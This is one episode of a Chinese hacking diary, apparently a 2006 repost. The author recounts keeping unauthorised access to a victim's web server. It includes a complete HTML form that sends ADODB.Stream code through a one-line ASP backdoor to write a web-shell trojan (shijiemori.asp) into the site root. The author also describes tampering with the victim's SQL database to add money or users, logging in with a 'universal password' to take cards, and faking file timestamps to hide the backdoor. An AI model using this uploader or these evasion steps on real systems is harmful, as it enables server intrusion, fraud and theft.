| 黑客与网管的30天的较量(六) |
| 作者:世界末日 来源:中华盾 加入时间:2006-3-21 www.cnitrc.com |
|
12月7日
当我再登陆后门的时候,发现后门也已经被删了,faint,心想管理员已经严重发现了我的存在。
没关系,在他的index.asp里,我还有一句话后门。在本地构建一个提交post.htm页面,内容如下:
<form action=http://XXXX/index.asp method=post>
<input type="hidden" name="system" value="shijiemori">
<textarea name=o cols=120 rows=10 width=45>set lP=server.CreateObject("Adodb.Stream")
lP.Open
lP.Type=2
lP.CharSet="gb2312"
lP.writetext request("p")
lP.SaveToFile server.mappath("shijiemori.asp"),2
lP.Close
set lP=nothing
response.redirect "shijiemori.asp"
</textarea>
<textarea name=p cols=120 rows=10 width=45>木马</textarea><BR><center><br>
<input type=submit value=提交></form>
'代码完成
把上面的“木马”改成你的木马代码,点击上传,就会在跟目录写入一个shijiemori.asp的木马,便可以用
http://XXXX/shijiemori.asp登陆
这样,我还是对他的服务器有看管理的权力。
12月12日
我把读卡面页设为本地读取,在本地连接他的SQL服务器,本地操作相当于远程操作,加钱,或增加用户,或管理数据库,呵呵。
12月14日
对方SQL服务器已经不对外了,心想是他发现了外部的连接,曰!他只对LOCALHOST开放,再 日。连不上去了,没办法,还得上去他服务器。
通过前面一句话木马我们还可以写木马进去,但是......但是......
写进去的木马几分钟后就被删了,原来,管理员对硬盘的文件实时监控,一发现有新增的文件或新修改的文件,都去检查一遍。
所以,我不敢写木马了,但,我还是可以用他的帐号并且万能密码进去取卡。hoho.
这里我想聪明的你一定会问,为什么他没发现我登陆的页面做了手脚?因为,我修改了那个文件的修改日期。
修改文件的日期程序目前我发现有2个,一个GUI界面,一个DOS,小刀给偶滴。比如把c:\windows\system32\cmd.exe的建立日期修改为2004年12月24日,这样管理员就不容易查出来啦。
所以,我的后门逃过此劫。
 |
|
|
未经书面授权严禁转载和复制本站的任何招聘信息和文章